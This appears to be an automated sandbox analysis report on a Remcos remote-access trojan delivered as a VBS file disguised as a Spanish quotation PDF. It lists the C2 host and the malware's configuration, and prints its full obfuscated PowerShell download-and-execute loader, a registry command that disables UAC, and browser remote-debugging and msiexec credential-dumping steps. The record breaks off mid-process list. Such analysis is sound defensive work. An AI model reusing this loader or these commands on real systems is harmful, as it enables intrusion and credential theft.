Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 16:34

General

  • Target

    Solicitud de cotización 11-11-2024·pdf.vbs

  • Size

    85KB

  • MD5

    e56ac816d58f9404f4dcdf20eaefc4e3

  • SHA1

    9e326579cf5f7fab3a13c7151263699247ec6c30

  • SHA256

    906ce7810e3b4d1729d3a5c3044af98b5447c0137c742476fa769df801fc843e

  • SHA512

    4d0b34a417df2d245a5c633ce5feb426780a11104773eca9b9ec1766a14ddd6d35f1fd96b26eb32e973d5688166376c041c63b659a8ee253348466acbfb7a936

  • SSDEEP

    1536:670tE9G0kixGd9papuoNHMqJ5uXsjJqPkKk/Qf/YugT1VBXaAj2abf:6Qa9GhAU9sh5u8sPQ/Qf/YuYVBzbf

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

t-vw8qw3d.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-OFN57D

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de cotización 11-11-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Milieubeskyttelseshensynene Instrumentalise Marmorqmr Noncatechistic Indgraveredes Bevisfrelsen Scotopias #><#Synkretiserede Teatrene angrebsvinklernes Emmenia Tilpasningsklausulen #>$Japonicize='Uligevgt';function Ejicient($Anjilas){If ($host.DebuggerEnabled) {$Phonocardiogramme++;$kermesic=$Anjilas.'Length' - $Phonocardiogramme} for ( $bruger=4;$bruger -lt $kermesic;$bruger+=5){$Protopodite=$bruger;$Beveling+=$Anjilas[$bruger]}$Beveling}function Canework($Preconsideration){ .($Bogreolerne231) ($Preconsideration)}$Prepronounce=Ejicient 'S,mfN broeEnteTBesv. .ntW lamEUndeB RneCKredL p oiIsene UnpnBunkT Rim ';$Rhymesters=Ejicient 'UncoM SgeoNatuzDatoiDownlSpell AffaDip /abso ';$Systemstart=Ejicient 'FlitTStaml,ikisVigi1Isot2 ra ';$Hypotype='indu[NithnSupeE.ndeTPryd.Stags.nruETaw.RBjrnvAhlmiVandcDrame K mP Z moSponiSaddNComptMagemM moAPre N IsoaPr,rG tomECutwrOver]kult:.anh:op usDagvE Fu CMoleuKennRKythiSnowtForkY,yngPBostR O aoOpdrTadvioRosacKaleO U tlUdlb=Stru$ upSAssaY.jemSJakoTHaaneL.erMdimeSDi lTUnenASegnRTablTFl,r ';$Rhymesters+=Ejicient 'Baan5Doll. Chr0Spge Luks(Er,vWCompiPho nSubpdSmatoNimkwbru sMora terNForsTMist ekt1Dias0Limn. Nul0Bort;Hjer BiotWrefliPe.onFinn6Pres4Sauc;K pr BepxAfpi6 ank4Auri;Pand EnlirTjenvmend: Ken1Rekl3Hypo1Koin.Bi k0 s u)S.er WagGEnkeeF gecargekbadeoLu,m/Data2Fors0Genn1 Ca,0Smel0 Yal1maa 0 Tan1k ss craF Cy iStiprBr,geSpilfFri,o mu x.lio/sp.i1Seks3 C.t1Scil.Femk0edde ';$brugermpedient0=Ejicient 'Dan uDrifsShelE,sexrPeac-SmedaHjkoGRevoe,yreNBla.TEnte ';$Differs=Ejicient ' UhrhGri,t FrotSurdpVejls ekn:Paed/Decl/StandUnfirAlieiAb fv atteProt. FargMc ioAn ioLaang lielLimmeAfbe.SyskcCelloEp lm Smi/fortuS gecr pa? Skie oanxS edp alaoethyrFlletTviv=Shadd,isro,hriwAnkenVan lWhasoe,ugaFurrdglad&Ge siP acdempo=Spar1CemeWSeceFParoODermQEgenZWienEAff S SkrtindvRA fl1AntamUgl,lUn.n1PostSsto MFliclFly - Virb idsX s r6FaucI UnjFObjeFLon K Hom4SoliUS.omuBladMOveruEvne1FormPt gnhClos ';$Pediatricians=Ejicient ' Buk>Bl,s ';$Bogreolerne231=Ejicient ' .esIB,reeS.ilXUnd ';$Albins='Turreted';$Phobiac='\Birkepollen.Eje';Canework (Ejicient 'Ch m$Unqug.ersLPostO uckbChe aSkytl Su.:To nsTophoGiganKentgn,npESemiRLito1T.pw2Be r8Snvl=Stil$Binrearc,NNonpvsprn: ,nsaKat,PMis P UfrDAlbua VanTIntra ngr+tr,g$Ud ep amohPegmoSha B UnfIdia a PadcGe n ');Canework (Ejicient 'isle$PathGReh.LPol OSubsbEq iASotaLRute:Aan FQueyE lcrToucIShieestyrh Pe UU ioSUnpieCountSkafSGrue= Bry$ VisdGr iiworcFFlygFHarmEStagr,russ In . atuSVensp PlalBoomi,rigtSkos(albu$SerupTillEDyesd nvei ,atAJanntSt erLysfiTeoscterriPrieAPromNsi,msO ts)Ic r ');Canework (Ejicient $Hypotype);$Differs=$Feriehusets[0];$Vorterod=(Ejicient 'Ca,y$Pr eG keLF,rhoDredBT ksaPotaLBrs :SympZPibeyTradgSt,eoVibrmBailA BiltHyttI,vercLyssO efoSHlerp T eh WhiES.ejN eksoUngeinapadembl=HeliNeftee irkwAb.o- .ovOTextB smojFribeCommc lagTHi t in iS UroYFugesBalst KonEKnalmT ut.Su t$PossPEvolR v.sEPresp ScorThr o TilN S soPyorU CannRut cK,biETran ');Canework ($Vorterod);Canework (Ejicient 'Sm,u$MagtZBesky,ollgVareoVegnmSwitaNu ltAutoi Br c.ondoFrodsa rap jesh SpoePi fnAtr oBeboiG,egdP eo.DelbHScopeDiaraBilad C.ieDehorArchsWool[k.nv$ D,sbBumlrSow uFol g nnieAc,nrCoremSammp SkaeSe idEutri staeM ksn montBefo0Pian]Urov=Li.r$RuneRm lehLin,yOliomTranesk tsUopstScabeAllir Ko,sStip ');$Antndelsen35=Ejicient 'Util$t lsZJenty .hagmakro ,atm plaaR fitYasmiM ricAbi,oEu,esCar pE.dehLaveeKompn hroSpndiMetrd oye.FrikDOveroF,rswProsnCis lGodso ManaV lgdForsFMeati Un lTjene G e(Over$BhalDRepaiOpmufS cif .rbeSalirPyrosNect, M n$LastRLeopiQuows En iKla kConnoka,df horr autiProke Sl sHenst M r)Sta ';$Risikofriest=$Songer128;Canework (Ejicient '.eto$Guttg Fe lT chOUdmubIsopaUdelL ra:slidmti gOSto R,jelpTempHPropIEradn F eELand=Alve(FdertTox e EffSnotatPost- RoopUnmoAFemtT einH urf Sca,$ RepROlieiSlvlsCautIDesskUndeOH lmfTimerViseiProgEL.ggsFlirT Kil)Spis ');while (!$Morphine) {Canework (Ejicient 'Husf$ OvegPlanlVandoB babHe raPinnlChuk:DisiO Judv Unse EirrT ilbUnpauSklmrOutbtEdelhAkaneSulfn Sma= lli$ nvtHararParauFr.keBeto ') ;Canework $Antndelsen35;Canework (Ejicient 'Wa sSDisstGeolA TudRApostSter- MalsunpeLUmi.EFrikEAngeP Pin Ope4Olva ');Canework (Ejicient 'R,mn$DrosgOc alMayaogas B Bn.a Anal Sp,:,eviMCircoAnd RAktipSk,bh,latiUdlgnOps.e Kol=Trom( mo T TalEBonbSUnditSkld-KilopDet AK rnTDiviH Pin B,ck$TotaRir eiNonlS DraI subKFelloPallfFyldrsqueiSnureBronS antFore)Peri ') ;Canework (Ejicient 'saks$Sy bGVinkL,ascoFrembUnalA StilSequ:NedfbJohaOScalu.oteRI teDHenfOPapbN Hi =Phil$EpisGT vel TorOCarwB E,caReg L efl: Gger M.saBo.dgK lka ombMYukouEvenfRvenfSpumiStatn rod+Afgi+ A.b% C a$SherfUdsmEDeprRBerlIMal.EPr fh ForULu.tSSkoseAfgaT ressKomm.HedacSp.roUnasUCowpN upTCent ') ;$Differs=$Feriehusets[$bourdon]}$Bevgeligst=284907;$Antecommunion=30136;Canework (Ejicient '.tyr$AlligkoglLSp.iOUm.lBoutcAPermljust:Slimm ca IKombSVolcjPr vU,remd TunGCultEMach Skri=Dith ListgOrloETot tSi.k-Tai,CBewroEnkeNBea,t TryeOutsNDe,uT Lig Soc $plicrTraniLaurSLimpiLesiKGe.uO Ba FSladRStyriAfdee,ollS ematarab ');Canework (Ejicient ' Ret$Su.dgBromlKlipoUlvibAnnoaHy rlBe g:MarvUTjurn,arstKorrhUrenrSpiliDi kfGldstG aaiRe rn .nte VegsDdsmsHous Fald=Alta ruma[ToppSSpeeyDruksOpdat N neUdlymMidn.BombCKlino FesnStipvD,steUndersorttM ta] os:W.ol:AggrF LgerKrukoAirlm TagBAffaaRegus Ma e .ar6G,nn4ProvS ph tS.lvrSkibi Deanmed gUnsh(Marg$CotwMDgneiSortsBl.njPrimu ormdDommgChereSter),abr ');Canework (Ejicient 'Sn,p$KirggGrnslbesyOOpdrbSurramandLBev : S,eFTok I atenAnthS AcekUnprEUns Bys =Lipo f.rs[ tyrs C iyLegas nogtAkkoEPopsMSelv.FacsT,avne lejx r fTWarr.R aeECarmnPejlC KjvOSamldNonsiOvernUphiGProp]osca:Oev : uarABygnS ileCP raIGeneIMusk.LynaGSlvkEbotaTOx,ds ondtCharRAnt,IRediN .llgocul(B,on$UnwiUN stNUnh,TLivshAnm.R DdsIDan.fTudsTDataiPlanNTrisEMa.uS AlmsF.de) Mas ');Canework (Ejicient 'Appl$UdenG MelLEnerOSt.nBKlu aMustLHjem:I dsfMongACzecIOmgiRGrunYPierhThyro olaOAfstDtils=Frus$UtaaFDispIV.nrnIsvrS StiK reqEV ri.U,orsDeloU Ba.bBaghsSa mtIncoRTea,I ldNPul gEmer(Ecti$NonfbLaunESkovvDe egU.iseEk hL,delISelvgTveks,ophtSubc, Eli$Da,aaUnchnEmi tD,seETalkCDysmoP lamcurrMCoa,uEvisnBrkvi FinoLegeNSere) Bom ');Canework $Fairyhood;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2736
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Milieubeskyttelseshensynene Instrumentalise Marmorqmr Noncatechistic Indgraveredes Bevisfrelsen Scotopias #><#Synkretiserede Teatrene angrebsvinklernes Emmenia Tilpasningsklausulen #>$Japonicize='Uligevgt';function Ejicient($Anjilas){If ($host.DebuggerEnabled) {$Phonocardiogramme++;$kermesic=$Anjilas.'Length' - $Phonocardiogramme} for ( $bruger=4;$bruger -lt $kermesic;$bruger+=5){$Protopodite=$bruger;$Beveling+=$Anjilas[$bruger]}$Beveling}function Canework($Preconsideration){ .($Bogreolerne231) ($Preconsideration)}$Prepronounce=Ejicient 'S,mfN broeEnteTBesv. .ntW lamEUndeB RneCKredL p oiIsene UnpnBunkT Rim ';$Rhymesters=Ejicient 'UncoM SgeoNatuzDatoiDownlSpell AffaDip /abso ';$Systemstart=Ejicient 'FlitTStaml,ikisVigi1Isot2 ra ';$Hypotype='indu[NithnSupeE.ndeTPryd.Stags.nruETaw.RBjrnvAhlmiVandcDrame K mP Z moSponiSaddNComptMagemM moAPre N IsoaPr,rG tomECutwrOver]kult:.anh:op usDagvE Fu CMoleuKennRKythiSnowtForkY,yngPBostR O aoOpdrTadvioRosacKaleO U tlUdlb=Stru$ upSAssaY.jemSJakoTHaaneL.erMdimeSDi lTUnenASegnRTablTFl,r ';$Rhymesters+=Ejicient 'Baan5Doll. Chr0Spge Luks(Er,vWCompiPho nSubpdSmatoNimkwbru sMora terNForsTMist ekt1Dias0Limn. Nul0Bort;Hjer BiotWrefliPe.onFinn6Pres4Sauc;K pr BepxAfpi6 ank4Auri;Pand EnlirTjenvmend: Ken1Rekl3Hypo1Koin.Bi k0 s u)S.er WagGEnkeeF gecargekbadeoLu,m/Data2Fors0Genn1 Ca,0Smel0 Yal1maa 0 Tan1k ss craF Cy iStiprBr,geSpilfFri,o mu x.lio/sp.i1Seks3 C.t1Scil.Femk0edde ';$brugermpedient0=Ejicient 'Dan uDrifsShelE,sexrPeac-SmedaHjkoGRevoe,yreNBla.TEnte ';$Differs=Ejicient ' UhrhGri,t FrotSurdpVejls ekn:Paed/Decl/StandUnfirAlieiAb fv atteProt. FargMc ioAn ioLaang lielLimmeAfbe.SyskcCelloEp lm Smi/fortuS gecr pa? Skie oanxS edp alaoethyrFlletTviv=Shadd,isro,hriwAnkenVan lWhasoe,ugaFurrdglad&Ge siP acdempo=Spar1CemeWSeceFParoODermQEgenZWienEAff S SkrtindvRA fl1AntamUgl,lUn.n1PostSsto MFliclFly - Virb idsX s r6FaucI UnjFObjeFLon K Hom4SoliUS.omuBladMOveruEvne1FormPt gnhClos ';$Pediatricians=Ejicient ' Buk>Bl,s ';$Bogreolerne231=Ejicient ' .esIB,reeS.ilXUnd ';$Albins='Turreted';$Phobiac='\Birkepollen.Eje';Canework (Ejicient 'Ch m$Unqug.ersLPostO uckbChe aSkytl Su.:To nsTophoGiganKentgn,npESemiRLito1T.pw2Be r8Snvl=Stil$Binrearc,NNonpvsprn: ,nsaKat,PMis P UfrDAlbua VanTIntra ngr+tr,g$Ud ep amohPegmoSha B UnfIdia a PadcGe n ');Canework (Ejicient 'isle$PathGReh.LPol OSubsbEq iASotaLRute:Aan FQueyE lcrToucIShieestyrh Pe UU ioSUnpieCountSkafSGrue= Bry$ VisdGr iiworcFFlygFHarmEStagr,russ In . atuSVensp PlalBoomi,rigtSkos(albu$SerupTillEDyesd nvei ,atAJanntSt erLysfiTeoscterriPrieAPromNsi,msO ts)Ic r ');Canework (Ejicient $Hypotype);$Differs=$Feriehusets[0];$Vorterod=(Ejicient 'Ca,y$Pr eG keLF,rhoDredBT ksaPotaLBrs :SympZPibeyTradgSt,eoVibrmBailA BiltHyttI,vercLyssO efoSHlerp T eh WhiES.ejN eksoUngeinapadembl=HeliNeftee irkwAb.o- .ovOTextB smojFribeCommc lagTHi t in iS UroYFugesBalst KonEKnalmT ut.Su t$PossPEvolR v.sEPresp ScorThr o TilN S soPyorU CannRut cK,biETran ');Canework ($Vorterod);Canework (Ejicient 'Sm,u$MagtZBesky,ollgVareoVegnmSwitaNu ltAutoi Br c.ondoFrodsa rap jesh SpoePi fnAtr oBeboiG,egdP eo.DelbHScopeDiaraBilad C.ieDehorArchsWool[k.nv$ D,sbBumlrSow uFol g nnieAc,nrCoremSammp SkaeSe idEutri staeM ksn montBefo0Pian]Urov=Li.r$RuneRm lehLin,yOliomTranesk tsUopstScabeAllir Ko,sStip ');$Antndelsen35=Ejicient 'Util$t lsZJenty .hagmakro ,atm plaaR fitYasmiM ricAbi,oEu,esCar pE.dehLaveeKompn hroSpndiMetrd oye.FrikDOveroF,rswProsnCis lGodso ManaV lgdForsFMeati Un lTjene G e(Over$BhalDRepaiOpmufS cif .rbeSalirPyrosNect, M n$LastRLeopiQuows En iKla kConnoka,df horr autiProke Sl sHenst M r)Sta ';$Risikofriest=$Songer128;Canework (Ejicient '.eto$Guttg Fe lT chOUdmubIsopaUdelL ra:slidmti gOSto R,jelpTempHPropIEradn F eELand=Alve(FdertTox e EffSnotatPost- RoopUnmoAFemtT einH urf Sca,$ RepROlieiSlvlsCautIDesskUndeOH lmfTimerViseiProgEL.ggsFlirT Kil)Spis ');while (!$Morphine) {Canework (Ejicient 'Husf$ OvegPlanlVandoB babHe raPinnlChuk:DisiO Judv Unse EirrT ilbUnpauSklmrOutbtEdelhAkaneSulfn Sma= lli$ nvtHararParauFr.keBeto ') ;Canework $Antndelsen35;Canework (Ejicient 'Wa sSDisstGeolA TudRApostSter- MalsunpeLUmi.EFrikEAngeP Pin Ope4Olva ');Canework (Ejicient 'R,mn$DrosgOc alMayaogas B Bn.a Anal Sp,:,eviMCircoAnd RAktipSk,bh,latiUdlgnOps.e Kol=Trom( mo T TalEBonbSUnditSkld-KilopDet AK rnTDiviH Pin B,ck$TotaRir eiNonlS DraI subKFelloPallfFyldrsqueiSnureBronS antFore)Peri ') ;Canework (Ejicient 'saks$Sy bGVinkL,ascoFrembUnalA StilSequ:NedfbJohaOScalu.oteRI teDHenfOPapbN Hi =Phil$EpisGT vel TorOCarwB E,caReg L efl: Gger M.saBo.dgK lka ombMYukouEvenfRvenfSpumiStatn rod+Afgi+ A.b% C a$SherfUdsmEDeprRBerlIMal.EPr fh ForULu.tSSkoseAfgaT ressKomm.HedacSp.roUnasUCowpN upTCent ') ;$Differs=$Feriehusets[$bourdon]}$Bevgeligst=284907;$Antecommunion=30136;Canework (Ejicient '.tyr$AlligkoglLSp.iOUm.lBoutcAPermljust:Slimm ca IKombSVolcjPr vU,remd TunGCultEMach Skri=Dith ListgOrloETot tSi.k-Tai,CBewroEnkeNBea,t TryeOutsNDe,uT Lig Soc $plicrTraniLaurSLimpiLesiKGe.uO Ba FSladRStyriAfdee,ollS ematarab ');Canework (Ejicient ' Ret$Su.dgBromlKlipoUlvibAnnoaHy rlBe g:MarvUTjurn,arstKorrhUrenrSpiliDi kfGldstG aaiRe rn .nte VegsDdsmsHous Fald=Alta ruma[ToppSSpeeyDruksOpdat N neUdlymMidn.BombCKlino FesnStipvD,steUndersorttM ta] os:W.ol:AggrF LgerKrukoAirlm TagBAffaaRegus Ma e .ar6G,nn4ProvS ph tS.lvrSkibi Deanmed gUnsh(Marg$CotwMDgneiSortsBl.njPrimu ormdDommgChereSter),abr ');Canework (Ejicient 'Sn,p$KirggGrnslbesyOOpdrbSurramandLBev : S,eFTok I atenAnthS AcekUnprEUns Bys =Lipo f.rs[ tyrs C iyLegas nogtAkkoEPopsMSelv.FacsT,avne lejx r fTWarr.R aeECarmnPejlC KjvOSamldNonsiOvernUphiGProp]osca:Oev : uarABygnS ileCP raIGeneIMusk.LynaGSlvkEbotaTOx,ds ondtCharRAnt,IRediN .llgocul(B,on$UnwiUN stNUnh,TLivshAnm.R DdsIDan.fTudsTDataiPlanNTrisEMa.uS AlmsF.de) Mas ');Canework (Ejicient 'Appl$UdenG MelLEnerOSt.nBKlu aMustLHjem:I dsfMongACzecIOmgiRGrunYPierhThyro olaOAfstDtils=Frus$UtaaFDispIV.nrnIsvrS StiK reqEV ri.U,orsDeloU Ba.bBaghsSa mtIncoRTea,I ldNPul gEmer(Ecti$NonfbLaunESkovvDe egU.iseEk hL,delISelvgTveks,ophtSubc, Eli$Da,aaUnchnEmi tD,seETalkCDysmoP lamcurrMCoa,uEvisnBrkvi FinoLegeNSere) Bom ');Canework $Fairyhood;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4928
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2236
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4136
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffaee6cc40,0x7fffaee6cc4c,0x7fffaee6cc58
          4⤵
            PID:468
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,5973090918743584558,1283894402924129498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1952 /prefetch:2
            4⤵
              PID:4480
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2052,i,5973090918743584558,1283894402924129498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:3
              4⤵
                PID:2892
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,5973090918743584558,1283894402924129498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2620 /prefetch:8
                4⤵
                  PID:1860
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,5973090918743584558,1283894402924129498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4536
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,5973090918743584558,1283894402924129498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1184
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4608,i,5973090918743584558,1283894402924129498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:824
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4148,i,5973090918743584558,1283894402924129498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4600 /prefetch:8
                  4⤵
                    PID:4780
                  • C:\Program Files\Google\Chrome\Application\Chrome.exe
                    "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,5973090918743584558,1283894402924129498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4540 /prefetch:8
                    4⤵
                      PID:4492
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gkzkwxxrvwcvglgksd"
                    3⤵
                      PID:1344
                    • C:\Windows\SysWOW64\msiexec.exe
                      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gkzkwxxrvwcvglgksd"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4548
                    • C:\Windows\SysWOW64\msiexec.exe
                      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qemcwpitieuaqzuoboitj"
                      3⤵
                      • Accesses Microsoft Outlook accounts
                      • System Location Discovery: System Language Discovery
                      PID:4880
                    • C:\Windows\SysWOW64\msiexec.exe
                      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\tysvxiamemmfsfrssydnugvl"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2500
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                      3⤵
                      • Uses browser remote debugging
                      • Enumerates system info in registry
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      PID:1448
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffaed246f8,0x7fffaed24708,0x7fffaed24718
                        4⤵
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:4636
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
